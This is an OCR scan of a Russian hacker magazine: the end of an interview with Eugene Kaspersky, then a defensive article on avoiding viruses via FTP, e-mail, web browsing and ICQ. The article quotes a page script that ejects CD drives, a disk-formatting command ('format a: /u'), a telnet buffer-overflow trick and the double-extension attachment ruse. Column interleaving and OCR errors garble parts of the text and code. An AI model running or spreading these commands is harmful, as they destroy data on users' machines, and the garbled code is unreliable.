человек, поэтому не буду употреб- 
лять в ответе слово "талант" :). Пе- 
реходя сразу ко второму месту в ие- 
рархии качеств, не могу не упомя- 
нуть высокую харизму, работоспо- 
собность, упорство и... вообще, еще 
неплохо жить рядом с офисом :). 


mindwOrk: Расскажите, как обычно 
проходит ваш рабочий день? 

ЕК; Ничего особенного. Континенты 
я не двигаю и судьбами мира не рас- 
поряжаюсь. Прихожу, сажусь за 
компьютер и "долбаю" вирусы. У нас 
даже есть такой термин для коллег- 
Bupyconoros - "дятел". "Дятел" - это 
тот, кто долбает вирусы. Получается, 
я главный :). 


minodwOrk: А вам никогда не хоте- 
лось после очередного завала плю- 
нуть на все и уйти в монастырь? :) 
Ну, или заняться чем-то менее нап- 
ряжным. 

EK: Уже не могу, вошел во вкус. Нао- 
борот, каждая новая задача вызыва- 
ет у меня блеск в глазах и желание 
быстрее погрузиться в ее решение. 


mindwOrk: На каком компьютере вы 
работаете в Лаборатории, и какой 


стоит у вас дома? Какими програм- 
мами вы пользуетесь в работе? 

ЕК; У меня несколько компьютеров: 
один - чистый, используется для 
коммуникаций с миром, остальные 
отданы на растерзание вирусам. Там 
я их препарирую. Все, за исключени- 
ем первого, изолированы от мира, 
чтобы у узников не появлялся соб- 
лазн сбежать на волю, и работают 
под управлением ОС Windows раз- 
ных версий. Из программ я исполь- 
зую наши внутренние утилиты, IDA, 
FAR и Pinball :). 


mindwOrk: Pinball? :) Вы часто 
играете в игры? Каким отдаете 
предпочтение? 

ЕК; Pinball ;). Играю нечасто, 
обычно в перерывах между 
решением задач, чтобы немного 
развеяться и привести мозги в 
порядок. 


mindwOrk: Пробовали ли вы сами в 
исследовательских целях написать 
вирус? Если да - расскажите о нем 
(них) поподробнее. Если нет - 
возникало ли такое желание? 

ЕК: Скажу честно - и без этого 
работы хватает. 


mindwOrk: Насколько, по вашему 
мнению, важно пользователю иметь 
на своем компьютере установлен- 
ный антивирус? Как вы оцениваете 
опасность при его отсутствии? 

ЕК; Антивирус нужен даже вирусо- 
логу. По крайней мере, чтобы про- 
тестировать работу своего детища. 
Пользователю тоже очень важно 
иметь защиту. Попробуйте выйти в 
интернет без антивируса, и уже че- 
рез несколько минут можете схлопо- 
тать какого-нибудь червя. Причем 
сегодня мы рекомендуем не зацик- 
ливаться только на антивирусе. Это 
не панацея. Нужно обязательно ста- 
вить межсетевой экран и просто 
учиться основным правилам компь- 
ютерной гигиены. 


mindwOrk: (делая страшные глаза) 
КАК? "Антивирус Касперского" не 
панацея против вирусов?? :)) 

EK: Такое позволяют себе говорить 
в отношении своих продуктов 
только, хм, не совсем честные 
разработчики. Это все равно, что 
утверждать - подушка безопасности 
гарантирует стопроцентную 
безопасность. 


mindwOrk: Какие технологии написа- 
ния вирусов сейчас наиболее попу- 
лярны у авторов? Есть ли у вас идеи 
алгоритмов вирусов, которые еще 
не использовались ни одним вирус- 
мейкером? 

EK: Технологии написания вирусов? 
Хм, самая распространенная - вклю- 
чил компьютер, загрузил С++ и на- 
писал. Другое дело, что сейчас пи- 
шут даже не вирусы, а больше сете- 


вых червей, атакующих бреши в сис- 
темах безопасности операционок и 
приложений. Мне, как, по сути, вра- 
чу скорой помощи, понятно, что у 
больного (интернета) болит, а что 
еще нет. Естественно, что я понимаю 
слабые места Сети и представляю 
возможные пути развития вирусопи- 
сательства. Только никто, кроме ме- 
ня, их никогда не узнает. Sorry. 


mindwOrk: Вы читаете ленту bug- 
{гаа? :) 
ЕК; Тсссссс! 


mindwOrk: На каком языке програм- 
мирования сейчас обычно пишут ви- 
русы? И каково примерное соотно- 
шение современных вирусов 
dos/win/cross-platform? 

EK: Большинство вирусов создает- 
ся на языках высокого уровня, типа 
С++ и Delphi. Ассемблер стал преиму- 
щественно оружием более взросло- 
го поколения, которое такими глу- 
постями не занимается. Хотя, сами 
понимаете, бывают и исключения. 
Что касается ОС - подавляющее 
большинство вредоносных программ 
(95%) нацелены только Ha Windows. 
Это логично, ведь эта операционная 
система - самая популярная. 


mindwOrk: А какие существуют плат- 
формы, где вирусов пока нет (или 
очень мало), но теоретически возмо- 
жен всплеск активности? Дайте ком- 
ментарий перспективам существова- 
ния вирусов на "экзотических" плат- 
формах. 

ЕК; Вирусы могут существовать вез- 
де, в любой среде, где выполняются 
следующие условия. Во-первых, по- 
пулярность. Естественно, что опера- 
ционная среда должна "накрыть" 
хоть одного вирусописателя. Во-вто- 
рых, документированность. Трудно 
написать вирус, не зная, как это де- 
лается, и не имея средств разработ- 
ки. В-третьих, незащищенность. Это 
отдельный вопрос. По умолчанию 
все операционки не защищены (нет 
идеального программиста и идеаль- 
ного, безгрешного кода). Просто бре- 
ши, может быть, еще не обнаружены. 
Так что незащищенность измеряется 
именно количеством обнаруженных 
брешей и отсутствием гарантирован- 
ных средств защиты, типа Sandbox. 
Примерьте эти условия к "экзотичес- 
ким платформам", и все станет ясно. 


mind 
фиксированные случаи появления 
вирусов на мобильных телефонах? 
EK: Нет. Проходили слухи о том, что 
написанные определенным образом 
$М5'ки могут завалить телефон. Но 
мы так и не добились их реализации 
в лабораторных условиях. Поэтому 
прошу считать это не более чем слу- 
хами. А вирусов (т.е. саморазмножа- 
ющихся программ) для классических 


мобильников нет. Есть несколько 


концептуальных образцов для 
смартфонов, но смартфон, сами по- 
нимаете, это, скорее, карманный 
компьютер, нежели телефон. 


mindwOrk: Кого вы считаете ведущи- 
ми в мире специалистами по виру- 
сам? Из числа ваших коллег, вирус- 
мейкеров или просто исследовате- 
лей этой области. Для всего мира вы 
являетесь авторитетом. Но сущест- 
вуют ли авторитеты для вас? 

ЕК: Как бы нескромно это ни звуча- 
ло, но я не вижу такого авторитета, 
который мог бы меня научить чему-то 
принципиально новому. Скорее нао- 
борот. Однако есть несколько очень 
талантливых экспертов, в том числе 
из конкурирующих компаний, с кото- 
рыми мы общаемся на одном уровне. 


mindwOrk: Как вы относитесь к про- 
фессиональным вирусмейкерам? 
Испытываете ли вы уважение к тем, 
кто создает оригинальные вирусы с 
хорошим кодом (не деструктивным)? 
Считаете ли вы, что всех авторов и 
распространителей вирусов, незави- 
симо от того, деструктивен их код 
или нет, следует судить и наказы- 
вать? Какое, по вашему мнению, на- 
казание является справедливым? 


EK: Извините за банальность, я к 
ним не отношусь. У вирусов по умол- 
чанию не может быть хорошего кода, 
это как атомная бомба - может ли 
быть хорошим средство уничтоже- 
ния людей? "Хорошесть" может ди- 
агностировать такой же испорчен- 
ный человек, как и сам автор вируса. 
Если сегодня он создал безвредный 
вирус, то от следующего его творе- 
ния может лечь интернет. Поэтому я 
приравниваю киберпреступников к 
клиентам остальных глав уголовного 
кодекса. Правда, наказание должно 
все-таки отличаться. Современные 
вирусописатели в большинстве слу- 
чаев - подростки, таким экзотичес- 
ким образом утверждающиеся в 
жизни. Ну не вышло у него с проти- 
воположным полом, ну хоть здесь, 
на геростратовом поприще, проявит 
себя. Мне кажется, таких еще можно 
вразумить. А что касается рециди- 
вистов - так этих наказывать по всей 
строгости закона. Вирусы - это не иг- 
рушки. Из-за них срываются много- 
миллиароные сделки, люди теряют 
года работы. Все это преступление. 


mindwOrk: А вы никогда не задумы- 
вались, что некоторые из таких лю- 
дей (не те, кто пишет деструктивный 


Евгений Касперский 
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ИНТЕРВЬЮ С ЕВГЕНИЕМ КАСПЕРСКИМ В 


Визуальные эффекты вирусов... 


код, и не школьники, клепающие ви- 
русы программами вирус-генератора- 
ми) возможно являются неплохими 
учеными. И создают вирусы не из 
любви к деструктиву, и не оттого, 
что "не вышло с противоположным 
полом", а потому что пытаются ис- 
следовать и создать новую форму 
жизни, развивающуюся самостоя- 
тельно. Своего рода Искусственный 
Интеллект. Как в свое время Иан 
Хеп и Джонатан Шок - ученые из 
Хегох и авторы первых вирусов. И 
вы действительно считаете, что 
ущербность индивида нужно оцени- 
вать по его _возможным_ поступ- 
кам?? Можно ли в таком случае 
назвать ущербным Fyodor'a - авто- 
ра небезызвестного Nmap, только 
потому, что он МОЖЕТ создать то, 
что не только сканирует, но и про- 
Bogut атаку DoS? 

EK: Я не вижу параллели между 
Хепом и Шоком, а также Пенроу- 
зом, Шталем, Висоцким и Макилро- 
ем - и ребятами, которые сегодня 
создают вирусы. Не убедили вы ме- 
ня. Не надо оправдывать киберп- 
реступность в любом ее виде науч- 
но-исследовательскими целями. Так 
можно оправдать и людей, создав- 
ших оружие массового уничтоже- 
ния. Да, они талантливы, местами 
гениальны, но продукт их деятель- 
ности деструктивен, а, следователь- 
но, порочен. 


тпам/оОгк: Ваше мнение о \Х-журна- 
лах, таких как 29А и Infected Voice. 
Источник зла или познавательная 
информация? 

EK: Мне кажется, им нужно лечить- 
ся. Особенно Infected Voice. Назва- 
ние говорит само за себя. 


mindwOrk: Лечиться, простите, от че- 
го? :) Велика ли разница между ин- 
формацией, публикуемой в подоб- 
ных журналах, и той технической ин- 
формацией, которой обмениваются 
друг с другом антивирусные органи- 
зации? 
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EK: Направление вектора разное: в 
одном случае - созидание, в другом - 
деструктивность. 


mindwOrk: А как вы относитесь к со- 
общениям, типа "Warning, all info we 
give is for educational purpose only. 
Don't use it for illegal activity", кото- 
рые печатаются в подобных издани- 
ях в содержании? Стоит ли приме- 
нять меры к авторам таких журна- 
лов только из-за того, что информа- 
цией может быть кто-нибудь когда- 
нибудь воспользуется в нехороших 
целях? Как вы относитесь к заявле- 
нию вирусмейкеров (и многих других 
людей), что любая информация име- 
ет право на существование и долж- 
на быть доступна всем людям? 

EK: Ага, а наркотики тоже должен 
попробовать каждый современный 
человек. Если продолжать аналогии, 
то получается хаос. Чтобы понять 
мои чувства к этим странным людям, 
представьте, что несколько лет я во- 
обще практически не вылезал с ра- 
боты - постоянно анализировал но- 
вые вирусы и разрабатывал защиту. 


mindwOrk: Хм, каким образом здесь 
задействованы личные чувства к ви- 
русмейкерам? Насколько я понимаю, 
это характеризует вашу любовь к 
работе, которой вы себя посвятили. 
Любовь к исследованиям. 

EK: Мне всегда казалось, что я спо- 
собен добиться многого и в других 
областях человеческой деятельнос- 
ти. Не было бы вирусов, может быть, 
Касперский был бы известен как... 
хм, скажем, Нобелевский лауреат по 
математике ;). 


ттпам/оОгк: Часто ли вирусмейкеры 
удивляют вас своими решениями 
(кода)? Какие три вируса вы считае- 
те самыми профессиональными и 
грамотными? 

EK: Бывают случаи, именно удивляют. 
Вот бы их голову, да в правильное рус- 
ло! Из самых громких могу отметить 
СН (Чернобыль), Magistr и Slammer. 


mindwOrk: А из негромких? :) Много 
ли вы встречали вирусов, которые 
могли учинить делов поболее Сиха, 
но, в силу определенных 
обстоятельств, не прижились, и о 
них вообще Mano кто знает? 

EK: Таких ну очень много. 


mindwOrk: В вирусмейкерском сооб- 
ществе уже давно бытует мнение, 
что "VX scene" постепенно отмирает. 
Уходят многие известные просдри, 
чтобы их заменить не хватает квали- 
фицированных вирусных програм- 
мистов. Чувствуете ли вы эту тен- 
денцию? И что об этом думаете? 

ЕК: Вообще чувствуется, что у меня 
уходит все меньше времени на ана- 
лиз вирусов, а тяжелые случаи по- 
падаются все реже. Будем надеять- 
ся, что это тенденция. 


mindwOrk: Какие сайты в интернете 
вы посещаете регулярно? На какие 
рассылки подписаны? 

EK: www.kaspersky.com :). 


mindwOrk: С вашей точки зрения, 
как специалиста, насколько иска- 
жают НЕкомпьютерные СМИ ин- 
формацию о появлении вирусов и 
червей? Не считаете ли вы, что они 
таким образом наносят определен- 
ный вред? 

ЕК: Искажения случаются. Причем 
примерно 50 на 50 в них оказыва- 
ются виноваты как сами СМИ, так и 
некоторые антивирусные компании, 
которые, в погоне за цитатами, 
иногда пускают откровенные утки и 
фальсифицируют события. С ваше- 
го позволения пальцем показывать 


не буду. 


mindwOrk: Как вы предпочитаете 
проводить отпуск? Как отдыхаете от 
компьютеров и работы? Ваши НЕ- 
компьютерные интересы и хобби? 
ЕК: Очень люблю лыжи и машины. 
Собственно им и посвящаю отпуска. 


типам/оОгк: Машины коллекционируе- 
те, собираете-разбираете или просто 
любите на них ездить? Лыжи - ходьба, 
слалом, прыжки с трамплина? :) И где 
предпочитаете пройтись на лыжах? 
EK: На машинах предпочитаю ез- 
дить. Сам принципиально езжу на Ла- 
де 99 модели, но за границей люблю 
пробовать другие марки. Лыжи гор- 
ные. Любимое место - Чегет. Именно 
там я впервые встал на лыжи. 


mindwOrk-Bauwn любимые фильмы и 
Книги? 

EK: Очень люблю Стругацких. А вот 
с кинематографом практически не 
общаюсь, после работы и книг вре- 
мени не хватает. 


mindwOrk: Что бы вы хотели передать 
тем ребятам, которые пишут вирусы? 
EK: Скорее повзрослеть и перестать 
заниматься ерундой. me 
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Свой Бизнес 
CGW-RU 
Хулиган 
Мобильные Компьютеры 
ХакерСпец 
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Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


ИНТЕРНЕТ - ПОТЕНЦИАЛЬНЫЙ ИСТОЧНИК ЗАРАЗЫ! | 


ИНТЕРНЕТ = . 
ПОТЕНЦИАЛЬНЫЙ 
ИСТОЧНИК ЗАРАЗЫ: 


КАК УБЕРЕЧЬ СЕБЯ ОТ ВИРУСОВ В СЕТИ 


T ы никогда не задавался вопросом, откуда берутся... вирусы? Да, несомненно, их пишут злоумышленники и выпускают 
на волю, дабы отыскать зазевавшихся жертв и заразить их рабочую машину, а если повезет, несколько машин... 


_ 
ирусы стали активно и если не соблюдать ряд правил, ак- случаев именно так и происходит. 
распространяться сре- туальных для каждой службы, мож- Это обуславливается несколькими 
ди конечных пользо- но поплатиться потерей сокровен- причинами: 
вателей со времен ной информации, а также системы 
рождения Сети. До (все зависит от типа вируса/трояна). ©. Любопытство. 
этого момента зараза могла перено- Причем с каждым годом технологии 
ситься с одного компа на другой "впаривания" заразы меняются, поэ- Живой пример: некий хакер Вася на- 
только с помощью хардварных носи- тому следует всегда быть готовым к писал новый вирус, который пока еще 
телей информации (в основном, дис- возможной попытке заражения. не детектится антивирусным ПО, и за- 
кет). А в наше время электронная лил свое творение на крупный ЕТР- 
паутина - не что иное, как среда оби- РЕ TRANSFER PROTOCOL обменник (не спрашивай, как он полу- 
тания и выживания вирусов, в кото- и Раз уж мы заговорили о серви- чил туда rw-gocTyn, говорю же, ха- 
рой они чувствуют себя сухо и ком- сах, попробуем разобраться в каж- кер). Спустя час ламер Петя, который 
фортно. дом из них. Пойдем по возрастаю- бродит по вебу в поисках крякера ин- 
По официальной статистике, через щей: на первом месте у нас находит- тернета, вдруг находит его на варезо- 
интернет передается 90% всех из- ся служба ЕТР, располагающаяся на отстойнике - FTP-cepBepe. Естествен- 
вестных вирусов. Подхватить заразу 21 порту. Сервис предназначен для но, Вася заранее обдумал, какое имя 
можно где угодно, и никто от этого обмена файлами и не более того. дать своему вирусу. Скачав 3noBpeg- 
не застрахован. Даже ты. Причем в Казалось бы, пользователь никогда ную программу, Петя запустил ее. Ко- 
большинстве случаев сам юзер спо- сам не будет скачивать и запускать нечно, никакого бесплатного интерне- 
ат собствует заражению. Ты можешь заразный файл, но в большинстве та он не поимел, но все пароли на 
альной ста- возразить, что это не так и послать 
тистике, че меня в... известном направлении, но LIL 
pes интер- 
нет переда- я бы не спешил с выводами. Прочи- C 
оС тав этот материал, ты увидишь всю По официальнои статистике, через 
стных eapy- — ОСТРОТУ поднятой проблемы. интернет передается 90% всех известных 
ватить за” ЛАКОМЫЕ СЕРВИСЫ INTERNET вирусов. 
где угодно, и Многие пользуются услугами 
Staton: глобальной сети. Причем все с раз- 
застрахо- ными целями. Кто-то посещает поз- 
aoe Даже навательные порталы и ‹флеймит на 


форумах. Некоторые интернетчики 
днем и ночью зависает в чатах и 
аськах (самые "умные" из них пыта- 
ются подсадить виря или троя начи- 
нающим пользователям и представ- 
ляют наибольшую опасность, но об 
этом позже). И, наконец, большин- 
ство просто залезает в интернет, 
чтобы проверить почту. Как ни 
странно, всех их объединяет одно - 
опасность подхватить электронную 
заразу. Чтобы этого не случилось, 
необходимо придерживаться прос- 
тых правил и всегда быть начеку. 
Тогда ни один злоумышленник не 
сможет впарить тебе трояна. 
Сетевые коммуникации состоят из 
отдельных сервисов, которыми сво- 
бодно пользуются юзеры. Но каж- 
дый такой сервис при определенных 
условиях может представлять серь- 
езную опасность для пользователя, 


ХАКЕРСПЕЦ 
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dial-up ушли Васе no e-mail. И npogon- 
жали уходить до тех пор, пока добрые 
люди не помогли жертве и не переус- 
тановили парню систему. Мораль: не 
скачивай неизвестный софт с любых 
ЕТР-серверов: это очень небезопасно. 
Даже если у тебя установлены перех- 
ватчики вирусов (о них будет сказано 
ниже), свеженаписанный троян не бу- 
дет ими обнаружен и с легкостью об- 
живется на твоей системе. 


@. Внушение. 


Способ получения вируса немного 
похож на первый. Точнее, совпадает 
его концовка, в которой юзер качает 
и запускает файл с ЕТР-сервера, к 
чему злоумышленник подталкивает 
его разными средствами. Это может 
быть письмо, в котором содержится 
ссылка на вирус и представление 
его как суперпрограммы, оптимизи- 
рующей работу Windows (ты дума- 
ешь, на это не клюнут? Еще как клю- 
ют! Особенно те, у кого мало ОЗУ). 
Вирусописатель может представить 
свое творение как самораспаковы- 
вающийся архив с фотографиями 
обнаженной Памелы Андерсон, 
ссылку на который отправит тебе по 
аське. Способов может быть много, 
а защита только одна: не доверять 
никому, кроме людей, которых зна- 
ешь долгое время (впрочем, они то- 
же могут быть заражены червяком, 
но об этом позже). 


@. Вирусы. 


Это может показаться странным, но 
сами вирусы могут скачивать новые 


зловредные программы. Яркий тому 
пример - старинная тварь по имени 
Homer, которая при соединении с 
ЕТР-сервером заливала свою копию 
в каталог /incoming (в Hero, по умол- 
чанию, разрешена запись). Но это 
было давно. Теперь вирусы стали 
умнее и могут скачивать свои новые 
версии по ЕТР, правда пользователь 
06 этом узнает только из отчета ан- 
тивирусного перехватчика... 


Время собирать камни. То есть сде- 
лать небольшой вывод из всего вы- 
шеизложенного. Я вижу спасение от 
всех трех бед одновременно в уста- 
новке антивирусного перехватчика, 
который проверяет сфрайлы "на лету" 
сразу после скачивания. Запустить 
заразу детектор не позволит. При- 
меры таких сосфтин - известные AVP, 
DrWeb, Norton Antivirus, McAfee... 
Этот список можно продолжать бес- 
конечно, так как антивирусов сейчас 


На серьезных ЕТР-серверах срайлы 
чаще всего снабжаются PGP-nog- 
писью, что дает возможность прове- 
рить неизменность бинарника. Для 
этого, используя утилиту pgp, и ко- 
манду: 


pgp.exe sotf.pgp soft.exe 


можно убедиться в соответствии би- 
нарных данных и защитного ключа. 
В конце анализа ты получишь итого- 
вое сообщение от РСР, сообщающее 
о валидности подписи файла. 


ПОЧТА - ЭТО HE ТОЛЬКО TEKCTO- 
ВЫЕ ДОКУМЕНТЫ! 

и Настало время поговорить о са- 
мом популярном сервисе интернета - 
e-mail. Множество юзеров лезут в 
Сеть именно для того, чтобы "снять 
мыло" (или написать кому-нибудь 
письмо). С этой службой тесно свя- 


Нужно проявлять бдительность и не 
скачивать подозрительные файлы с ЕТР- 
архивов. 


развелось много (их обзор ты мо- 
жешь найти в тематической статье 
этого номера). Но одной надежды на 
совершенство программы недоста- 
точно. Нужно проявлять бдитель- 
ность и не скачивать подозритель- 
ные файлы с ЕТР-архивов. Доверять 
на 100% можно лишь хорошо заре- 
комендовавшим себя серверам. 


Разумеется, темный пользователь сразу 
потянется своими шаловпивыми ручками 
к файлу и откроет его. 
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Осторожно! Тут может быть вирус 2 ; 
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заны две нехорошие вещи - спам и 
вирусы. Первое нас не особо инте- 
ресует, а вот вирусы по мылу расп- 
ространяются довольно часто. 

Ты наверняка сталкивался с такой 
ситуацией: получаешь почту, а в 
ящике письмо от некой 
sexy_girl@yahoo.com. В аттаче ви- 
дишь файл sexy_girl.jpg с симпатич- 
ной графической иконкой. В довесок 
ко всему в теле письма написано, 
что девушка искала тебя всю свою 
жизнь и решилась-таки послать сво- 
ему кумиру фотографию в неглиже 
;). Разумеется, темный пользователь 
сразу потянется своими шаловливы- 
ми ручками к файлу и откроет его. 
Итог плачевен: компьютер заражен 
вирусом. Более того, файл имел наз- 
вание "sexy_girl.jpgl40 пробе- 
лов].ехе" - стандартная уловка ви- 
русмейкеров... 

Другой пример: в аттаче содержится 
нормальный текстовый документ, и 
ero имя - letter.doc. Без задней мыс- 
ли юзер открывает этот файл с по- 
мощью MS Word и заражается... мак- 
ровирусом, который уже давно меч- 
тает выбраться из неволи и начать 
плодиться пошустрее, чем кролики в 
Австралии. Конечно, макрокоманды 
можно отключить, но иногда они так 
полезны в работе, что рука не Nog- 
нимается их выключить. 

Иногда даже не требуется открывать 
файл. Это сделает за тебя дырявое 
ПО компании Microsoft, а именно его 
почтовый клиент Outlook (или более 
тонкий и популярный в народе 
Outlook Express). Откроет, заразит 
компьютер и заботливо разошлет 


» 


Без задней 
мысли юзер 
открывает 
этот файл с 
помощью 
MS Word и 
заражает- 
ся... макро- 
вирусом, 
который 
уже давно 
мечтает 
выбраться 
из неволи 
начать пло- 
диться по- 
шустрее, 
чем кролики 
в Австра- 
лии. 


Не скачивай 
неизвест- 
ный софт с 
любых ЕТР- 
серверов: 
это очень 
небезопас- 
но. 


Службы 
поддержки 
бесплатных 


почтовых 
служб забо- 
тятся о сво- 
их клиентах 
и предлага- 
ют бесплат- 
ную провер- 
ку почты на 
вирусы. 


ИНТЕРНЕТ - ПОТЕНЦИАЛЬНЫЙ ИСТОЧНИК ЗАРАЗЫ! | 


Стандартное письмо с вирусом в аттаче 


Используй только новые и только 
надежные e-Mail клиенты. 


копию вируса по всей адресной кни- 
ге (интересный сервис, не правда 
ли? ;)). Пример такого вируса - изве- 
стный | Love You, который несколько 
лет назад прошел грозой по всей 
Сети. Отсюда правило: используй 
только новые и только надежные е- 
mail клиенты. Для Windows приме- 
ром такой программы является лю- 
бимый многими The Bat! (www.rit- 
labs.com). Если нет Летучей Мыши, 
можешь юзать стандартное Web-MbI- 
ло, которым разрешают пользовать- 
ся на бесплатных Май-сервисах 
(www.mail.ru, www.pisem.net и проч.). 
Но не все так плохо. Службы подде- 
ржки бесплатных почтовых служб 
заботятся о своих клиентах и пред- 
лагают бесплатную проверку почты 
на вирусы. Отказываться от нее в 
наше время глупо, а в ряде случаев 
- просто невозможно (только вот, к 
сожалению, предоставляют ее дале- 
ко не все сервисы). Примером такой 
халявы является тот же тай.ги. 

Что мы имеем? Если не забывать 
про антивирусное ПО и мое настав- 
ление про The Bat!, можно, в принци- 
пе, не опасаться вирусов... Конечно, 
если ты сам не будешь открывать 
первый попавшийся аттач письма. 
Не стоит забывать и об информаци- 
онных сайтах, которые оперативно 
сообщают об обнаружении новой 
дырки в почтовых программах. Про- 
читав такую сводку, необходимо в 
срочном порядке обновить версию 
клиента. 
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ОПАСНОСТЬ ВСЕМИРНОЙ 
ПАУТИНЫ 

m Не менее популярным сервисом 
является \\/\/М/. Да-да, это тот самый 
НТТР-сервис, располагающийся на 
80 порту. Мало того, что он предос- 
тавляет возможность заражения 
скачанными файлами, но и таит в се- 


бе особую опасность - скрипты и вы- 
зовы Activex. 

Последние встречаются крайне peg- 
ко, потому как пишутся в основном 
грамотными людьми, а такие редко 
глупостями занимаются. Кроме того, 
АсНуеХх-контролы легко отключают- 
ся в браузере, поэтому обсуждать их 
я не буду. Но вот насчет скриптов 
поговорим подробнее. Они бывают 
нескольких видов. Самые популяр- 
ные это JavaScript и VBScript. Hanu- 
сать простенькую программу в таких 
примитивных средах может любой 
школьник (особенно Ha VBScript, т.к. 
основан OH на простейшем Visual 
Basic'e). 

Рассмотрим пример. Совсем недавно 
был обнаружен ресурс www.vke.ru, 
исходник главной страницы которо- 
го содержал следующий код: 


<SCRIPT language="VBScript"> 
<!-- 
Set OWMP = 
CreateObject("WMPlayer.OCX.7") 
Set colCDROMs = 
oWMP.cdromCollection 
if coICDROMs.Count >= 1 then 
For i= О to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next ' cdrom 
End № 
aay 


</SCRIPT> 


Назвать вирусом такой код, конечно, 
нельзя. Но вреда от него много. Ме- 
ня самого чуть не хватил инфаркт, 
когда все сидюки в моем системном 
блоке разом открылись. Я привел 


Но вреда от него много. Меня самого чуть 
не хватил инсраркт, когда все сидюки в 
моем системном блоке разом открылись. 
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The Bat! - безопасный клиент нового поколения 
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В Opera и Mozilla этот скрипт не работает 
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Что с помощью винодового telnet.exe мож- 
но переполнить буфер, завалить систему 
или выполнить произвольный код. 


этот код лишь для того, чтобы еще 
раз доказать, что в браузерах (осо- 
бенно одной известной компании) 
можно найти сколько угодно дыр, 
через которые легко получить сис- 
тему под контроль. 


Хочешь пример посерьезнее? Пожа- 
луйста! Браузер Internet Explorer (он 
является самым популярным во 
всем мире) вплоть до 6 версии был 
уязвим досадным багом, который 
позволял выполнить любой систем- 
ный файл. Я думаю, не стоит гово- 
рить о последствиях такого запуска. 
Злоумышленник мог исполнить как 
заранее закачанный вирус, так и ко- 
MaHgy echo у | format а: /u. Фанта- 
зия тут безгранична! Правда, Ha 
багтраке давалась возможность 
проверить свой браузер на примере 
запуска обычного калькулятора :). 
Проверить своего ослика можно по 
этому адресу: 
www.nics.com.ua/VULN/BROWSERS/ 
RunProgram.shtml. 


Если порыться в интернете на тему 
выполнения произвольного кода че- 
рез IE, можно найти ошеломляющие 
сведения. Путем хитрой замены па- 
раметра заголовка, передаваемого 
клиенту, становится возможным за- 
качать и выполнить (!!!) произволь- 
ный бинарный файл. Mano того, что- 
бы доказать это неверующему юзе- 
ру, автор бага демонстрировал за- 
пуск тестового бинарного файла на 
компьютере клиента. Повторюсь, 
уязвим был лишь Internet Explorer, 


неверно принимающий НТТР-заго- 
ловок 
(www.solutions.fi/iebug2/run.cgi). 
Нередко встречаются вредоносные 
страницы с Java-Kogom, позволяю- 
щие произвольно передвигать окно 


браузера, а также плодить его окош- 
ки, пока не кончится свободная опе- 
ративная память. Как говорится, 
голь на выдумки хитра ;). 

Еще одна фишка, активируемая че- 
рез Web - зловредное использова- 
ние иного типа принимаемого срай- 
ла. Я думаю, ты знаешь, что браузер 
позволяет выполнять запросы, ори- 
ентированные не только на http:// и 
ftp://. Эксплорер запросто запустит 
telnet.exe, если встретит тип telnet://, 
либо mIRC при начале ссылки вида 
irc://. Этим и пользуются злоумыш- 
ленники, создавая цикл на 
JavaScript, плодящий такие запросы. 
Это в лучшем случае. 

В худшем случае хакер может полу- 
чить полный доступ к твоем компью- 
теру. Как это происходит? 

Было обнаружено, что с помощью 
виндового telnet.exe можно пере- 
полнить буфер, завалить систему 
или выполнить произвольный код 
(правда, это относится лишь к 
Windows 9x). Дело в том, что прило- 
жение отводит под HostName 255 
байт и в то же время не контролиру- 
ет его размер. С помощью умелого 
запроса, предоставленного браузе- 
ру (telnet://long-host), Windows зави- 
сала на корню. 

Существует также вид ресурса 
file://, который используется для об- 
ращения к локальному файлу на 
компьютере. С этим связана одна 
шутка, которую придумали смеха ра- 
ди ;). А именно: была сделана ссылка 
на file://c:/ в отдельном фрейме с уг- 
рожающей надписью "Я знаю, что » 


Злоумышленник мог исполнить как зара- 
нее закачанный вирус, так и команду echo 
у | format а: /u. 
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Запускаем калькулятор через багу в Internet Explorer 


Нередко 
встречают- 
ся вредо- 
носные 
страницы с 
Уауа-кодом, 
позволяю- 
щие произ- 
вольно пе- 
редвигать 
окно брау- 
зера, а так- 
же плодить 
его окошки, 
пока не 
кончится 
свободная 
оперативная 
память. 


Во вкладке 
"Безопас- 
ность" 


настроек 
ICQ выбери 
Direct-coe- 
динение 
только пос- 
ле подтве- 
рждения. 
Это предо- 
твратит 
случайную 
передачу 
файла и 
скроет твой 
IP-agpec. 


С появлени- 
ем Windows 
98 и уязви- 
мости вида 
con/con, ви- 
русы стали 
ориентиро- 
ваться на 
выполнение 
такой ко- 
манды, вы- 
Bogs из 
строя 
компьютер 
жертвы. 


ИНТЕРНЕТ - ПОТЕНЦИАЛЬНЫЙ ИСТОЧНИК ЗАРАЗЫ! | 


Miranda - хороший клиент с хорошими настройками 


Но безопасность превыше всего, 
поэтому лучшим решением будет 
отказаться от скриптов. 


ты хранишь у себя на диске С:". Ка- 
кое-то время пользователи реально 
пугались такого прикола :). Кстати, 
такой фрейм пропускал только 
Internet Explorer... 

Ну что? Достаточно аргументов для 
того, чтобы выключить обработку 
Java- и УВ-скриптов? Я понимаю, 
что в мирных целях они вполне мо- 
гут украсить Web-pecypc и сделать 
жизнь веселее. Но безопасность 
превыше всего, поэтому лучшим ре- 
шением будет отказаться от скрип- 
тов. Сделать это можно в опциях 
браузера, вкладка "дополнительно" 
(для Internet Explorer). 

Вообще ослик IE похож Ha дуршлаг, 
если учитывать количество дырок в 
нем. Поэтому советую тебе серфить 
паутину чем-нибудь более надеж- 
ным. Хорошую конкуренцию экспло- 
реру может составить Орега или 
Mozilla, в которых дырок на порядок 
меньше. Либо оставайся с IE, только 
вовремя ищи на 
download.microsoft.com заветные 
патчи gna него. 


РАДОСТИ ОБЩЕНИЯ В ICO 

m Наконец мы добрались до тех ин- 
тернет-юзеров, кто ночи напролет 
проводит в онлайне. А именно, поль- 
зуется нехитрой службой под назва- 
нием ICQ. Аська с давних времен 
обосновалась на 5190 порту. 
Как ты, наверное, уже понял, опас- 
ность представляет все, что способ- 
но передавать файлы. В ICQ есть 
возможность пересылки файла мето- 
дом peer-to-peer (прямого соедине- 
ния между собеседниками). 
Как и в любом чате, в ICQ нет своих 
правил общения, поэтому оно может 
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проходить разными путями. Ты мо- 
жешь разговаривать с другом из gpy- 
гого города или с девчонкой, которая 
постучалась к тебе в аську 5 минут 
назад и желает познакомиться... Вот 
тут следует быть осторожнее. Если 
персона назвалась Мариной и сказа- 
ла, что очень сексуально выглядит, 
это вовсе не означает, что ты ей дол- 
жен доверять. На этом и строится 
психологический метод внушения. 
После непродолжительного общения 
эта якобы девушка пытается впарить 
тебе свою фотографию (якобы в об- 
